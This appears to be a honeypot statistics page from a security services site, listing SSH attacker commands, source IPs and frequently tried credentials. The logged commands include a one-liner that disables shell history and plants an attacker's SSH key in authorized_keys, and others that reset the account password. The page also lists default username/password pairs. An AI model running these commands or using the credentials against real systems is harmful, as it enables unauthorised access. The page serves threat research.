# Ethical Hacking & Cyber Security services
A honey pot is a computer system on the Internet that is expressly set up to attract and "trap" malicious traffic and people who attempt to penetrate other people's computer systems.
Essentially it's a software or hardware component used as decoy, in order to be able to study attacks in real time.
Look at my honeypot stats:
You can download dictionaries of passwords, usernames and pass+users collected from SSH attacks:
General honeypot stats below:
Date | Command | Source | |
---|---|---|---|
2019-07-24 07:02:51 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 104.248.255.118 | United States |
2019-07-24 06:19:45 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 74.63.232.2 | United States |
2019-07-24 06:17:35 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 152.115.50.82 | Denmark |
2019-07-24 03:58:16 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 109.110.52.77 | Russian Federation |
2019-07-24 03:55:43 | lscpu | grep Model | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:37 | uname -a | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:31 | uname | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:25 | top | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:20 | nproc | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:20 | nproc | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:14 | uname -m | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:09 | w | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:55:00 | crontab -l | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:55 | ls -lh $(which ls) | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:55 | which ls | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:49 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:49 | free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:41 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:41 | cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;} | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:36 | echo -e "pass1234\\nW#hW3lsGAWJM\\nW#hW3lsGAWJM"|passwd|bash | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:36 | Enter new UNIX password: | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:54:30 | cat /proc/cpuinfo | grep name | wc -l | 59.13.139.46 | Korea, Republic of |
2019-07-24 03:40:57 | lscpu | grep Model | 92.141.137.152 | France |
2019-07-24 03:40:52 | uname -a | 92.141.137.152 | France |
2019-07-24 03:40:47 | uname | 92.141.137.152 | France |
2019-07-24 03:40:42 | top | 92.141.137.152 | France |
2019-07-24 03:40:30 | nproc | 92.141.137.152 | France |
2019-07-24 03:40:30 | nproc | 92.141.137.152 | France |
2019-07-24 03:40:25 | uname -m | 92.141.137.152 | France |
2019-07-24 03:40:20 | w | 92.141.137.152 | France |
2019-07-24 03:40:15 | crontab -l | 92.141.137.152 | France |
2019-07-24 03:40:07 | ls -lh $(which ls) | 92.141.137.152 | France |
2019-07-24 03:40:07 | which ls | 92.141.137.152 | France |
2019-07-24 03:40:02 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | 92.141.137.152 | France |
2019-07-24 03:40:02 | free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} | 92.141.137.152 | France |
2019-07-24 03:39:57 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | 92.141.137.152 | France |
2019-07-24 03:39:57 | cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;} | 92.141.137.152 | France |
2019-07-24 03:39:52 | echo -e "asd\\no-viNJH4J8bD\\no-viNJH4J8bD"|passwd|bash | 92.141.137.152 | France |
2019-07-24 03:39:52 | Enter new UNIX password: | 92.141.137.152 | France |
2019-07-24 03:39:47 | cat /proc/cpuinfo | grep name | wc -l | 92.141.137.152 | France |
2019-07-24 02:48:10 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 165.227.124.229 | United States |
2019-07-24 02:25:45 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 206.189.94.158 | United States |
2019-07-24 02:22:44 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 51.91.36.96 | France |
2019-07-24 02:06:13 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 180.76.97.86 | China |
2019-07-24 02:01:50 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 36.66.149.211 | Indonesia |
2019-07-24 01:50:33 | lscpu | grep Model | 138.68.140.76 | United Kingdom |
2019-07-24 01:50:29 | uname -a | 138.68.140.76 | United Kingdom |
2019-07-24 01:50:23 | uname | 138.68.140.76 | United Kingdom |
2019-07-24 01:50:18 | top | 138.68.140.76 | United Kingdom |
2019-07-24 01:50:13 | cat /proc/cpuinfo | grep model | grep name | wc -l | 138.68.140.76 | United Kingdom |
Date | Source | |
---|---|---|
2019-07-24 09:15:43 | 134.19.187.75 | Netherlands |
2019-07-24 09:15:40 | 5.188.86.206 | Ireland |
2019-07-24 09:15:38 | 5.188.87.52 | Russian Federation |
2019-07-24 09:15:25 | 134.19.187.75 | Netherlands |
2019-07-24 09:15:20 | 5.188.86.207 | Ireland |
2019-07-24 09:15:14 | 5.188.86.164 | Ireland |
2019-07-24 09:15:09 | 5.188.86.167 | Ireland |
2019-07-24 09:14:59 | 5.188.87.55 | Russian Federation |
2019-07-24 09:14:48 | 5.188.86.196 | Ireland |
2019-07-24 09:14:43 | 5.188.87.49 | Russian Federation |
2019-07-24 09:14:36 | 5.188.86.169 | Ireland |
2019-07-24 09:14:34 | 5.188.86.211 | Ireland |
2019-07-24 09:14:29 | 5.188.86.207 | Ireland |
2019-07-24 09:14:05 | 134.19.187.75 | Netherlands |
2019-07-24 09:14:03 | 5.188.86.167 | Ireland |
2019-07-24 09:14:01 | 5.188.87.52 | Russian Federation |
2019-07-24 09:13:55 | 185.220.221.208 | Czech Republic |
2019-07-24 09:13:49 | 5.188.86.164 | Ireland |
2019-07-24 09:13:48 | 5.188.86.206 | Ireland |
2019-07-24 09:13:42 | 5.188.87.55 | Russian Federation |
Count | Username | Password |
---|---|---|
1873829 | admin | admin123 |
13790 | root | changeme |
5320 | admin | |
3262 | admin | aerohive |
1323 | ubnt | ubnt |
1304 | admin | admin |
1202 | 111111 | admin |
1200 | adm | 12345678 |
645 | 1234 | 1234 |
622 | adam | adam |
619 | a | a |
617 | adm | adm |
616 | acc | acc |
615 | adm | 123456 |
610 | 123 | 123 |
Count | Source | |
---|---|---|
79796 | 5.188.86.211 | Ireland |
59484 | 5.188.87.55 | Russian Federation |
58135 | 88.214.26.88 | |
57877 | 5.188.87.51 | Russian Federation |
57334 | 5.188.87.49 | Russian Federation |
56776 | 5.188.87.53 | Russian Federation |
56272 | 88.214.26.89 | |
55673 | 5.188.87.52 | Russian Federation |
55081 | 5.188.86.194 | Ireland |
55054 | 5.188.87.54 | Russian Federation |
53827 | 5.188.86.169 | Ireland |
53446 | 5.188.86.165 | Ireland |
52687 | 5.188.86.208 | Ireland |
52573 | 5.188.86.167 | Ireland |
52466 | 134.19.187.75 | Netherlands |
52442 | 5.188.86.210 | Ireland |
52050 | 5.188.86.197 | Ireland |
51213 | 5.188.86.170 | Ireland |
50666 | 185.220.221.203 | Czech Republic |
50624 | 5.188.86.195 | Ireland |
Connections | Source | |
---|---|---|
79854 | 5.188.86.211 | Ireland |
59518 | 5.188.87.55 | Russian Federation |
59061 | 88.214.26.88 | |
57890 | 5.188.87.51 | Russian Federation |
57349 | 5.188.87.49 | Russian Federation |
57162 | 88.214.26.89 | |
56786 | 5.188.87.53 | Russian Federation |
55715 | 5.188.87.52 | Russian Federation |
55123 | 5.188.86.194 | Ireland |
55082 | 5.188.87.54 | Russian Federation |
53885 | 5.188.86.169 | Ireland |
53529 | 5.188.86.165 | Ireland |
52753 | 5.188.86.208 | Ireland |
52625 | 5.188.86.167 | Ireland |
52545 | 134.19.187.75 | Netherlands |
52518 | 5.188.86.210 | Ireland |
52104 | 5.188.86.197 | Ireland |
51262 | 5.188.86.170 | Ireland |
50692 | 185.220.221.203 | Czech Republic |
50671 | 5.188.86.195 | Ireland |
If you want to take a look to the source code of this page, go to my project HoneyStats! (github)
Want to know more? Check out my Security LAB!